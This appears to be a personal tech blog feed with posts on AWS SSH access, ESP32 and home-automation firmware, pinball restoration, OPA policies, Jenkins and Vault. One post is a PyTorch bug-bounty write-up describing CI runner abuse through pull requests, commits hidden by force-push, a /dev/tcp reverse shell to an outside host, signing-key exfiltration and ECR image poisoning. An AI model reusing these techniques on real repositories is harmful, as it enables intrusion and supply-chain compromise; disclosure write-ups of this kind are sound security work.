I needed to PoC a solution for SSH users that are backed by an IdP but ran into some issues.
EC2 Instance Connect (IMO) seems to be way under promoted by AWS, and I feel like that’s a real disservice if you need (I’m so sorry for you) SSH (I do for this case).
The TLDR for ec2 instance connect:
aws ec2-instance-connect send-ssh-public-key --instance-id i-08e2c277f1ea9a99a --instance-os-user marcus.young --ssh-public-key file:///home/myoung/.ssh/asdf.pub
http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/marcus.young
for 60
secondsssh -i {private key that matches the public key} marcus.young@{public ip of the instance}
and gets in.That’s crazy cool, but we have a few issues outright (major ones):
--instance-os-user not.me
and getting in. Fine in small cases bad for observability. You could tie this back to a user but that sucks. Youd have to tie back the SendSSHPublicKey
cloudtrail call with the iam user/role via the request params to the box, and if youre not shipping auth.log youre screwed. If 100 people do this at once you’ve lost. There’s no way to see which key material let who in to run what. If you thought “Oh I’ll use sts principaltags” I love you. Keep reading.Let’s get started.
First we need to bring up an Okta with IAM identity center.
Sorry peeps but if you think I’m doing that walkthrough just ctrl+w
and touch grass. Not happening.
Let’s assume you have a working IdP and you can get into AWS. Let’s start there.
So impersonation….
The answer here is an SCP and sts principalTags.
For the principal tags, it’s sort of straight forward. Unless you discover an IAM identity center bug like I did.
If you’re using IAM identity center: You’ll need to use
https://aws.amazon.com/SAML/Attributes/AccessControl:{ attr name}
in Okta.
The bug? Do not use both AccessControl
and PrincipalTag
. Apparently the IdC freaks out during the SAML jank and wont do anything.
So in Okta, add this:
Also while you’re add it make sure you’re using the nickName for the username.
At this point go ahead and measure success by making sure that your user is in the first.last
format and your AssumeRoleWithSAML
call in Cloudtrail has the principalTags on the requestParameters
. And by that I mean get angry and weep for 8 hours then find out you’re hitting an invisible AWS bug. I’ll wait.
Thanks for coming back.
Your user doesn’t have to be in this format but it tracks with my needs and my SCP as well as my janky NSS code. Modify it if you need. You do you.
1 2 3 4 5 6 7 8 9 10 |
|
OK. Now that you’re getting the metadata lets lock it down.
We’re going to apply this SCP:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
Very cool right?
What we’ve done now is said “Any call to SendSSHPublicKey
has to have a --instance-os-user
param that matches your userName
principalTag that was set by okta
Prove it:
1 2 3 4 5 6 7 8 |
|
1 2 3 4 5 6 7 8 9 10 11 |
|
Bam. Now you can’t straight up ssh as others outright.
OK that part’s done, but we still have another blocker: the user has to exist first. That sucks if you have a thousand users. I don’t know about you but I don’t want to have to sit there and crawl Okta for users that may never ssh in.
OK So the way ec2-instance-connect software works (remember above about what SendSSHPublicKey does and ends it to the metadata endpoint):
AuthorizedKeysCommand
lines to /etc/ssh/sshd_config
http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/{user name}
So we can’t rely on crawling, we can’t rely on ssh, but we can rely on nss since thats what ssh relies on for passwd
.
OK so I sound like an expert but I’m not. A large chunk of this was hacked out by another person at work, but I’m familiar enough. Don’t lose hope in me yet.
So SSH talks to NSS. We can hook into NSS to do some logic and create a user like this
So now in my user-data I have this sin:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
I basically compile my nss garbage and add create files
to passwd
in /etc/nsswitch.conf
This means that when a user attempts to SSH it will hook in my C code that calls a script
That script does a
curl http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/{user name}
.
If it gets a 200-300 code (the user has put a public key in there - remember this only works for 60s) then it will create the user.
After create
I still have files
so that SSH will go back and look them back up in /etc/passwd
. So assuming they ran the aws ec2-instance-connect send-ssh-public-key
command then tried to ssh within 60 seconds: they’ll have a user with a matching public key and they’ll get in.
Bonus: we should be able to do this to get into private instances.
For this proof I’m going to assume you have a public instance 1.2.3.4
and a private instance you want to reach 10.0.0.50
Let’s make your ~/.ssh/config
file look like this:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Let’s jump to that private-vps
by using the my-bastion
as a jump host.
Hint: You’ll need to make 2 SendSSHPublicKey calls. One to the public (so you can get into it) and one to the private (so you can also get into it)
First let’s prove we can’t just get in. So you know I ain’t lyin.
1 2 3 4 5 6 7 |
|
Told you. Let’s push the key to both. (remember you have 60s. obviously id write a tool for this later).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
Very cool. So what did we accomplish?
pkill
sshd for the named user (a win over shared users) on the bastion and effectively kill them off everywhere.
This lets me send data from my tilt to (in my case) datadog via Zapier!
Lets dive in:
The tpicoc3 has 2 chips that can talk over UART.
So for this Im using micropython on the ESP32 to read BLE for iBeacons (tilts allowlisted), connect to wifi, send the data both over UART and HTTP POST. The RP2040 will read on UART and display to the TFT.
You flash the different chips by USB-C polarity (flip the cable).
First we have to figure out which side is which. If you plug it in and run dmesg
you’d see either something that says RP2040 or JTAG (ESP32).
Below is the dmesg
output for ESP32
1 2 3 4 5 6 7 8 |
|
Lets erase this bad boy. You’ll need to install esptool first.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
Next lets grab the binary for the ESP32C3. That is (currently) here
$ wget https://micropython.org/resources/firmware/esp32c3-usb-20220618-v1.19.1.bin
Lets flash it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
If you want to send the data via HTTP POST, grab that here
$ wget https://raw.githubusercontent.com/pfalcon/pycopy-lib/master/urequests/urequests/__init__.py
Load up thonny and flash it. Make sure you jump IO9 to GND (one time cost). In Thonny load up this code
Make sure to modify the HTTP post information (or remove it altogether) as well as the wifi info
Hit save, choose the microcontroller and youre done here.
Next: the other side. Flip your USB c cable.
Now hold the Boot button, press Run, let go of boot. The screen will go black and you should see a new drive show up named RPI-RP2
Lets flash it.
You’ll need tinygo and go set up. If you dont: then just drop the (asuming you trust me, but the RP2040 cant use wifi or anything anyway) binary from here
Drop it into that RPI-RP2
drive and unmount it.
Bam. Done.
]]>
4/18
Initial research/exploit with an automated case response.4/20
First human response to forward to the pytorch team.4/27
I reached out to follow up.5/11
Meta responds that there is no update.6/9
I reach out again to ask about bounty terms and push for a >6 week response.6/22
Meta responds: Unfortunately after discussing this with the product team this isn't an issue we're going to fix or reward, although code execution is possible on these machines its by design and additionally the product team has mentioned that the actions are spun up on short lived nodes (similarly to how github operates their own action runners) which limits the impact further.
6/24
I respond with multiple follow ups explaining (and again exploiting further) the scope and severity including secrets exfiltration and prove lateral movement abilities. I exploit it further and PyTorch notices and bans my user. I set up a zoom call to talk.6/27
Call goes well, team is respectful and insightful, discuss remediation, things affected and scope.6/30 - 7/22
I use favors to get in contact with the team after another month of no responses.7/22
- Meta responds ‘We’re still in discussion with the product team’ and refuses further discussion about impact and bounty8/16
- Another follow up sent with no responses.8/19
- After more favors I’m able to escalate it to a new security engineer at meta that provides an extremely long and helpful response8/22 - 8/24
- Back and forth about scope and impact8/24
Resolved and $10,000 bounty paid out with a 7.5% bonus due to timeline
I run a somewhat successful open source github action runner project
Github provides CI runners but they have some nuances around configuration and ability. You can run your own, however, if you have special needs such as hardware requirements, security policies, etc.
There’s a lot of information around the hardening of these that indicate that running them on public repos is a bad idea.
That said: if you need to you still can but you should be mindful of a few settings.
The most important setting is what I decided to go after.
That first checkbox isn’t the default, but if you’re not careful it seems safer than it is. What it means is that if you’re not a new user, you can submit changes to the CI yaml and itll affect what’s run in the PR. So that’s what I did.
I spent an hour or so using carefully crafted google search like site:github.com inurl:workflows +"self-hosted"
and pulled up around maybe 30 or so candidates.
The issue is that there’s no way to know if they have this checkbox until you open a PR and you potentially notify people of what you’re doing.
Throughout these pull-requests I was able to further abuse a github UI bug that let’s me “hide my commit” and it appears as though I merged my PR. It’s confusing and weird but it removes the ability for them to see what I was doing.
What I did here was:
runs-on: self-hosted
) with something like: run: echo "Testing refactor"
.git rebase -i HEAD^
. This is the key part. This basically resets my branch to the default branches SHA. Meaning there’s no difference at all in tree history between the default branch (that I targeted for a PR) and the current branch/PR now.git push origin {branch_name} -f
The bug above is simply that the github UI now sees no changes to the branch (0 files changed). And since the SHA exists as the HEAD SHA on the default branch: it looks merged. Now there’s no way to see what I did. The emails from git only show a link to the PR with some metadata that a file changed, but not what. If someone had an integration it would have had to be able to pull the diff from my SHA to theirs immediately. Because I force pushed it’s no longer in existence in my fork so it’s gone forever and after a few seconds there’s no way to pull what my change showed.
The best part is: it already kicked off a potential github actions run though.
So here one of two things happens:
echo "Testing refactor"
Now it’s late at night, I’ve sumbitted and undone roughly 30 PR’s until I get a hit.
PyTorch.
This repo has a ton of yml in all shapes and fashion. And it makes sense to use self-hosted because of all the specialized hardware to run GPU acceleration.
I basically had full reign to any of these now that I can submit any change to CI.
The question is only: is there monitoring in place? Honestly this isn’t common because CI is just all over the place. Tests change, infra is all over the place with requirements changing in dependencies, etc.
So I decided to shell in with a reverse shell. A reverse shell means I’m going to make it connect to something I have so that I can get into it as opposed to me going into it directly. Same result, but backwards. To do that I spun up a small digital ocean box and set up a reverse shell listener with nc -u -lvp 9001
On CI I issued a pull-request with
run: sh -i 5<> /dev/tcp/143.110.155.178/9001 0<&5 1>&5 2>&5
On my digital ocean box: I’m now connected to the machine.
From here I noticed 2 things:
Basically they wouldn’t live forever but I had root on both.
My first attempt was to exfiltrate CI secrets but this didn’t quite work because forks cant exfiltrate secrets via the actions yaml (theyre not in the forked repo). I was able to prove, however, that a few things such as Android builders ran via docker and would land on these instances with the secrets nightly + on-demand. I can’t force that to happen but I would be able to exfiltrate the signing key once the docker container was running with docker inspect {container id} | jq '.[].Config.Env[0]'
Next: AWS abuse. I wasn’t able to find out directly but these instances had access to many s3 buckets. They likely had write access to some meaning I could plant files but that’s boring. What they did have though was ECR image support. Without ECR Immutable tags on (confirmed) I would be able to rebuild any image for use by downstream internal projects. Meaning that if downstreams werent locking images to their build SHA’s (most dont on latest or semver tags in general) I could implant anything into these containers and re-push them so that downstream projects would pull them. The effect of this at this time is unknown as this isnt the pytorch distributable, but the hope would have been that I could supply-chain internally. This scope stays “tbd”.
It also didn’t appear that these run in a VPC meaning that unless security software is installed there’s nothing to prevent me from doing boring malicious stuff like mine crypto, blast emails, etc. If it were in a VPC I’d still have this possibility but things like GuardDuty (if enabled) would catch me doing things and flag it as irregular activity. Not worth it here and a good way to violate reasonable disclosure.
The IAM access (both from the role attached to the instance) and the IAM user were overprovisioned and also contributed to the bounty. The PyTorch team is futher lowering the permissions here to only necessary as well as (I’m assuming) bucket policies to match.
]]>
About a year ago I got my hands on a Batman pinball that was in very bad shape and gutted for $300 (an unheard of price even for that shape).
I decided to go all in and just wing it.
I removed the legs and bought new Williams/Bally black legs from pinballlife.com
You can see the shape its in generally. The wood is complely broken on every edge. The rails and lockdown bar were rusted but in great shape. I contacted someone locally that does metal work and got them brushed then powder coated. They came out looking brand new.
Next was the body work
I got the new artwork from Retro Refubs. Theyre vinyl which kind of stinks compared to the original artwork. Don’t get me wrong, it looks absolutely fantastic but theres something about the original artwork being printed directly on the wood that I love (I dunno what that process is called).
The front speaker panel was missing everything and the logo was obviously hand painted. I bought new grills and used an angle grinder to en-biggen the cut out for a PinDMD v3.
I did a shit job because angle grinder so after the DMD fit I 3d printed a bezel that came out looking great.
Next Was the screen.
I only had a 22” LCD and it came out just looking bad. There was so much wasted space due to the backglass housing being a near perfect square, so a rectangle left a ton of vertical space even though it was fairly large.
I used this time to research square LCDs. Turns out these are niche af. I ended up landing on a LM265SQ1-SLA1 which is 26.5x26.5” square but 1920x1920. I also ended up finding an unbranded 12V board that claimed to support that resolution and the same LVDS 4 channel 8 bit 92 pin connector. It worked out great. You can see the size difference between the original on the left and the LM265SQ1 on the right from the backside. It was also expensive as shit at roughly $500 for the screen + controller.
I then mounted it using the same bracket as before and a sliding lock and got a local glass shop to cut a custom tempered ¼” glass panel for it. It ended up a few millimeters too wide so its a total pain to get in but i was able to do it without shattering it.
I then started putting a computer in it. I used an intel i5 with a quadro m4000 I happened to be sitting on. I originally mounted it normal but it did not work with the coin door and I really wanted the computer to be reachable where it was since it fit great.
I ended up getting a PCI-e flex cable and mounted it to the side with a stand to survive gravity. I also 3d printed custom mounts for the power supply and coin buttons so i could mount momentary switches and use the coin buttons as inputs for the virtuapin controller + digital plunger.
Next I found a 46” TV that fit like a dream after removing the LCD from the panel. I ended up mounting it similar to this (not my pinball in this photo):
I ended up welding pipe mounts directly to the steel backing on the LCD. This was a risky move considering the … you know … electrical nature and heat of a welding machine but it worked. I went slow and just did a few tack welds then slid a galvanized pipe through it so I can lift it up for access. Then I built a bezel out of wood and vinyl wrapped it in black vinyl and laid the glass in.
Lastly I resin printed a bunch of custom L brackets (because I wanted them as tiny as possible and couldnt find any that were under 6mm wide). I resin printed about 24 of them at a time so it took a few days.
After carefully taking it home I set it up and put the Batman Returns lego Batmobile me and the kiddo built on top as a DIY topper
The software its running is still in progress but works great. Just turn it on and windows loads the PinballX front end that pulls in some Pinball FX3 games (cheesy but people that come over love it) and some VPX (which look almost real!) games like Johnny Mnemonic, Addams Family, etc. The bumpers and gyro all work great. I have a servo in there but it draws too much power if you press the bumpers too fast and causes the USB bus to falter and require a windows restart so I’ve not hooked it back up.
If youre curious here’s some of the parts list:
If I had to guess I spent roughly $1500 out of pocket. If I wasn’t sitting on parts it would be closer to $2200.
]]>
I backed this project because plaato makes really good quality stuff. The idea of having a weight based keg estimator for my barcaderator was key.
They promised multiple times they’d allow people to capture the data themselves. They have yet to deliver.
1 2 3 4 5 6 7 8 9 |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
|
So I decided: why not do it myself?
In january 2020 I did a PyTN talk about how to sniff the data. While cool, it didn’t really bear much fruit. The amount of effort to make this be my end game was a bit much and I’d be reliant on always intercepting it. I did however know that its got an ESP32-D0W0 (wroom) as the brains and it didnt look that complicated.
So I took it down again and flashed a basic esphome build to it (the code is here.)
This was easier than it looks, you just need a steady hand. Once you flash it the first time you can do pure OTA updates.
I wont go into absolute detail but you can just look at the pinout for the ESP32 and solder leads to the pins directly. RX, TX, Gnd, Vcc, and GPIO (grounded) directly to an FTDI programmer.
First I made a backup of the original firmware:
1 2 |
|
Then I flashed the new one built from ESPhome:
1 2 3 |
|
Now it shows up in ESPHome as expected!
I then used a (very old) osciloscope to try to map out the load cells (load cell combinator is pretty boring (yayyy) and just drags the voltage, ground, data, etc over a ribbon cable to the main PCB. This main PCB uses a P##
notation which are not 1:1 with the ESP32 (booooo)
I was able to discover that the clock for this is P14. I then used a multimeter to correlate P14 to GPIO16 (by dragging the other load across all the ESP32 pins until a beep gave it away). I did this to discover the data pin from the load cell combinator is P28. My handy dandy Multimeter let me correlate P28 to GPIO 17 on the ESP32.
I was able to figure out the LEDs without an oscilloscope by just using a multimeter. The main PCB just uses GPIO to turn those pins high or low to run the 3 LEDs, which is boring (yay).
The rest was trial and error.
Next I used zapier webhooks to receive the HTTP Post from esphome to send it to Zapier, which then sends it to datadog.
Check out the repo for my up to date esphome yaml
]]>This took about a year, off and on. With covid I finally found some time to finish it.
I ran into a lot of issues.
GPIOA
and GPIOB
for EXPANDER_COL_REGISTER
and EXPANDER_ROW_REGISTER
SPLIT_KEYBOARD
here does not work with an IO expander like the MCP23018. This is poorly documented IMO. You have to use two of the same chipsets to use that feature and the feather 32u4 aint cheap]]>
If you see a trend in my latest blogs it’s likely you’ll guess i really like OPA.
We use it in EKS to report on assertions consistently across all our clusters.
I use it to run tests against the gatekeeper rules.
It’s pretty awesome, and it supports terraform plans.
I started off by forking the upstream atlantis AMI and baking the aws-cli into it.
In my atlantis.yaml I set up all the repos to use a new workflow opa-workflow
such:
1 2 3 4 5 6 7 8 9 |
|
This pushes the plan file as production_1234_somesha11122.json
into the bucket.
Next we have an AWS lambda with conftest built in. It responds to terraform/tfplan/*.json
S3 create notifications, parses out the SHA, PR number, and workspace from atlantis, then runs:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Once this works, we can parse back the info to a comment and send a success|failure status to the git sha!
1 2 3 4 5 6 7 8 |
|
I’ve had a few people ask me why I did it this way as an AWS lambda vs just running it on atlantis. I actually tried this first, but it wasn’t “clean”.
First: if atlantis plan fails, its not very intuitive, especially if it’s not a terraform error. It’s kind of an unformatted stack trace.
With that exception it’s not very feedback friendly. The point of this project is to provide a clean feedback loop for those who may not know or care what OPA is. We have quite a few methods of automatically generating terraform projects from cookie cutter + modules. I wanted a way of providing as much context as possible.
Next: we have a fairly large engineering team and I like to work in a “plugin” modal. When I’m introducing something new I like to be able to toggle it on and off quickly, or gather metrics before pushing for changes. In this way, it’s completely separated from Atlantis and has its own SDLC, which is nice from a “Marc, you broke everything” perspective.
Lastly I had to make a call from a security perspective. The point of this is 100% to be able from an upper architectural/infosec level to make assertions. For example: tagging. Tagging for us is partially for billing, partially to see our accountability plane, but mostly so that we can scope least privilege.
Having this with atlantis would mean the policies live in the atlantis repo for the container builder - I dont want to bounce atlantis every time we add/change policies.
Otherwise it would mean the policies live with the terraform which means that you could modify the assertions per-branch which is also a choice we made to avoid. These policies are open for contribution from everyone but it’s an explicit rule that it’s not meant to be able to shifted per branch and introduce a threat model around modifying it to pass when it shouldn’t.
]]>I’ve spent the last year figuring out what I want to control “things” in my house. And after wasting a bunch of time and money I finally have a set up I like.
I don’t have any crazy networking gear, just a Netgear r7000 running Kong
I now have a very different set up.
Configuring this for my setup is painful, but:
First I played with tasmota and the devices would randomly require me to set them up again.
Have you ever bought a device that turns on, sets up an AP for you to connect to then configure it? Thats a lot like Tasmota.
The problem is that in just a few days I had to set up the same devices multiple times. So I’d go to do something, it wouldnt exist in homeassistant, and Id see a few tasmota-#####
AP’s I had to set up again.
I solved this by pulling the source code down, modify the configs (which took a lot of figuring out for the settings), compile it, flash it. Per device.
Then I had to upload the actual config for pins/buttons/etc. I hated this. Every second of it.
After playing around with way too many things, I finally landed on esphome.
Esphome is amazing. It has over-the-air updates, it automatically compiles based on some yaml and uploads it! If it cant upload it (like the initial flash) I would simply set up the yaml, compile it, SCP it locally and flash it with https://github.com/espressif/esptool. If this worked, it would now support OTA updates.
Because its a bunch of yaml I can source control it too!
It uses passwords for both API integrations (home-assistant) and for OTA updates (same or different password) which makes me feel good.
Also: the server runs as a container, so its running on my Server network on nomad. I can simply go to http://esphome.service.consul and click “Upload” to update my IoT.
As for the controlling the devices I chose home-assistant. It has great support for ESPHome.
This is what you’re really here for. Everything is ESP based for esphome.
I flashed almost all of these with an ftdi serial adapter and esptool.py similar to
1 2 3 4 5 |
|
This one took some learning to get right. Its a nodemcu ESP8266 hooked up to a 12v relay shimmed to the garage door trigger. Triggering GPIO16 triggers the relay. Attached to GPIO5 is a reed switch on the garage door track that is open or closed. The reed switch is a magnetic based switch. When a magnet is near it, it breaks the switch (open) meaning the garage door is closed. I wired it this way so that the only way the door can be considered “closed” is that the magnet has broken the sensor. No power, messed up sensor, manually opened (without using the garage door chain) etc would all be considered an open door. I chose this because I’d rather be safe than sorry and the door being closed is not an assumption but a fact.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
This one is in progress. It works but I haven’t finished the housing (needs to be gasket based and ABS).
This is based on a wemos d1 mini and is essentially 2 12v solenoid valves on GPIO16 and GPIO14. the 12V is controlled based on circuitry through diodes and TIP120 fed from a 12V source (dropped to 5v via a LM7805 to the d1 mini).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
This one is still a bit in progress. My end goal is to take snapshots on an interval and push them to s3 so that I can play around with machine learning, but right now it lets me view it in hass (no recording as of now).
I chose the esp32-cam because it’s very cheap. That’s all, and it supports esphome. The housing I 3d printed from here
Note: This was a bit annoying to set up the first time. You can’t “just flash it”, you need to set up spiffs correctly. Which looked like this:
1 2 3 4 5 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|
In the kids room I have some star lights, and on our Pergola I have some waterproof LED lights all controlled with:
This magic home smart controller . I chose this because its ESP8266 based and flashable!
Wiring that up to the FTDI I flashed this yaml:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
|
For the bulbs I chose globe brand because theyre also ESP8266 based.
For 2 of 3 of these I had success with tuya-convert which was pleasant. Basically I built my .bin from the yaml below, replaced tasmota.bin in that dir with it because I’m sneaky, ran tuya-convert, flipped the light off/on 3 times and it flashed.
For 2 of them (1 I broke), I had to get down and dirty. I basically tore it apart and followed this guide. Temporarily soldering and removing all the heat safe gunk is not fun. But 1 flashed. 1….caught fire….
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
|
These come in handy for seasonal stuff like xmas lights, etc. But especially for my 3d printer as an emergency safe-measure (forget to turn off etc)
I chose the Sonoff S31.
Easy to take apart, a bit annoying to flash (involves temporarily soldering), but work amazingly.
The yaml makes sure that its on by default and that the power button is a hard toggle for the power for manual control. Blue light indicates wifi, red indicates on/off for the relay.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 |
|
I kept blowing my outdoor smart bulb, I’m guessing the voltage or current is too volatile?
I chose the TreatLife single pole.
This yaml lets the LED indicator (GPIO4) toggle with the virtual button (GPIO13) and the physical button (GPIO12)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
I was at kubecon the in mid-November with an old roommate (in the same industry as me) and some coworkers but got to see some cool kubernetes stuff.
Since my job crosses the Security boundary, and I’m fairly new to k8s, most of my talks were somewhere on the basic level or opa level. With OPA what you get is a lightweight language to write policies your kubernetes cluster should adhere to.
Typically (I think) this is traditionally run by building your policies into a sidecar and forcing it to be an admission controller.
Gatekeeper simplifies this by removing the side-car for native CRD’s and adds a few things like audit logs.
I’m going to build up an example of this using EKS.
I assume we have a working EKS cluster:
1 2 3 |
|
Before we deploy anything, let’s set up GateKeeper v3:
1
|
|
Gatekeeper should now be running (albeit with no policies):
1 2 3 4 5 6 7 8 9 |
|
Next, before we move on, I’m going to set up policykit so that we can use real REGO (the language for OPA) instead of rego embedded inside yaml (allows policy testing etc later on):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
What we have now is a rego file that will validate base images (parameterized). Let’s write some tests.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
Now let’s generate our ConstraintTemplate (the basic template that accepts parameters):
1 2 3 |
|
Let’s see what that ConstraintTemplate looks like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
As you can see that rego is now embedded inside a ConstraintTemplate yaml. Let’s apply it:
1 2 |
|
We have a template but no OPA rules yet.
1 2 3 4 |
|
Let’s add a rule to deny anything that’s not from alpine
(ironically the opposite of secure):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
We can now see Gatekeeper has it:
1 2 3 |
|
Let’s push up a Helm chart that violates it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Did it work?
1 2 3 4 5 6 7 8 9 |
|
It’s not running. let’s look:
1 2 3 4 5 |
|
And just like that we enforced a policy that prevented this from running!
More to come from OPA as I get more comfortable with it and learn how to test the policies before they go into K8S!
]]>I recenly got into doing random stuff with arcades. In October 2018 I got ahold of a completely ripped apart San Fransisco Rush cabinet. I redid some of the wood, built a computer into it, reversed all the controls into a teensy and made it play Rocket League. My tattoo shop is currently painting it (build log to come when I have it back).
In trade, I’m fixing their arcade machine.
So now apparently I like real arcade machines and not my now-broken table top.
I also brew beer. Why not combine the two?!
So I introduce to you:
The lattepanda runs Ubuntu with MAME. I originally chose windows, but LEDBlinky is awful. Just awful. So instead I’ve been working with LEDSpicer by Patricio Rossi. The software worked nearly out of the box and he’s been super helpful for getting me up and running.
]]>
I recently came across some neglected and forgotten “Aviary” scooters and wanted to see what could be done.
This was the easiest hack I’ve ever done. Remove the top panel with security bits, and replace the board with one from ebay similar to this
Plug it in and go. Done. Cost: ~$40
This one was much more fun.
This one was easy. Apparently the Xiaomi Mijia m365 is very commonly hacked already. They’re extremely popular overseas, and people have already dedicated their time to reverse engineering the firmware. So much so that you can just use a webpage to change the settings and download a binary file to upload.
Just download your bin file there, upload with the android app connect to your scooter and go.
This one was also slightly trivial.
First thing I did was 3D printed one of these bad boys.
Then I ordered a 0.96” screen (4 pin i2C not 7 pin SPI)
Next you’ll need an arduino micro pro and an FTD1232 flasher as well as a diode.
Using this code flash the arduino, wire it according to his guides below.
Note: I modified the locale files with some maths along with other tweaks I’m not publishing to do miles instead of kilometers, change the intro logo and colors.
Cover it using any m365 button cover via ebay.
Done.
]]>I, uh. Yeah.
I assume you read my previous post about my physical deploy button. Well: I one-upped it.
Let me explain. Nah let’s cut to it. I wanted to play with AWS IoT and I did so shamelessly with much architecture.
I had a spare Raspberry Pi Zero W with a camera. So I did what any reasonable person would do. Used it with no end-goal.
I hooked it up to AWS IoT and made it listen to the shadow delta MQTT queue
Basically whenever it saw a change to the shadow it would:
Without further ado I give you: Hulk Smash Production.
The initial gif
And the final gif (yes the hulk hand is duct taped to a bamboo skewer to a stepper motor):
]]>Over the last few weeks I’ve been looking for a project.
I currently work for a python shop and have really taken a liking to it. Simultaneously, I keep seeing new hardware supporting micropython. I’m not against the C’ish language that the arduino type stuff pushes for, but it’s nice to get the best of both worlds: an abstracted language with nice syntax and the ability to do dumb stuff with voltage. So: I did just that.
I’ve really wanted to play with the ESP8266 after seeing some cool projects cross over my feeds. I decided also to kill two birds with one stone and try the Huzzah board from adafruit that includes onboard wifi because I hate money. The board itself was fantastic out of the box.
Without doing any whatsoever much research my brain really thought that micropython was going to be a “drop in replacement” for the UX of programming a board in the arduino IDE. It’s not. This is actually my biggest complaint about micropython. The code itself was very very very straightforward. Write a main.py
that does your stuff, and profit. You can load libraries that support micropython, etc.
Getting there? Meh.
First: you have to flash your esp with the micropython firmware.
Next: you have to get your code onto the board. The feedback loop for this is the annoying part. The first time you flash the firmware you have to enable WebREPL. It’s a one-time cost but it’s smelly. This enables a wifi broadcast from the board that you can then access from webrepl with a password.
If you make it past the previous step you can make main.py
join your wireless network (note: 5ghz is not supported) with something like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now that it’s on the network you can use webrepl to the local address of the huzzah. But it still sucks compared to the typical UX of: select board, click compile.
If you’re still reading I’m sure you want to see what I did. Basically I took 4 mechanical keyboard switches (I have a lot OK?!), wired them to the huzzah, and made it send a slack command to our internal slack bot to force deploy production (ignore all locks, send a message to yours truly).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
It works and it’s pretty empowering to smash. We deployed to production a record number of times that day.
]]>Let me start off by saying: I’ve done a lot of Jenkins.
I’ve done new Jenkins (I love 2.0 and love Jenkinsfile’s).
I’ve worked with large jenkins installs. I’ve worked with small jenkins at multiple shops.
I’ve automated backups with S3 tarballs:
1 2 3 4 5 6 7 8 9 10 |
|
I’ve automated backups with thin backup.
I’ve automated creating jobs with job-dsl
I’ve automated creating jobs with straight XML.
I’ve automated creating jobs with jenkins job builder.
They all suck. I’m sorry. But they’re complex and require a lot of orchestration and customization to work.
My problem with all these previous methods is they require a hybrid suck. You have to automate the jobs and mix that with retaining your backups.
I’m tired of things using the filesystem as a database.
These things are complex because the data lives in the same place as the jobs. When you build up your jobs they contain metadata about build history. So you end up with these nasty complicated methods of pulling down and merging the filesystem.
My hypothesis: #(@$ that. Lets use a real database and artifact store for the data and just not care. Crazy Right?!
I’ve got some demo code to prove to you how easy it is. It’s 100% groovy. No job dsl, no nothing. Just groovy and java methods. The one I posted shows how I automated groovy to set up:
My jenkins master is docker. Its volatile. And its stateless.
So how do I do it? In production my docker hosts listen to UDP port 555 with Logstash for syslog and forward them to ELK (because SSL, and other reasons). In my example the logstash plugin just sends directly to elasticsearch. All the env vars are pulled from vault at run time and I get to manage the data like my other data from ELK.
My artifacts go to someting like artifactory.
And guess what? It’s fantastic. Automation is dead simple. And I put the data in a real database. which lets me do things like see build times across projects, see deployments, etc.
]]>
An example of how I typically get Vault into my base Container:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
If you somehow get the previous part to run, it will fail because you have to create the role in Vault before you can just start generating certs off it. In the cuddletech guide this is under Requesting a Certificate for a Web Server
as:
1 2 3 4 5 |
|
But what if I told you, you could do that in terraform?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
If you add that with your ECS task along with the vault role and policy from the previous post about Vault Anything in Terraform, all your dependencies are met and kept in code!
You can now generate certificates off your PKI backend and grab secrets all in one go!
]]>(This is actually mostly a clone from here but I want to make sure it never disappears)
Note: You should not let the vault server generate the root CA, you should generate it and import it. I just havent figured out how to do that yet. I will update this post when I get around to it. More info on that here
1 2 3 4 5 6 7 8 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
Verify
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
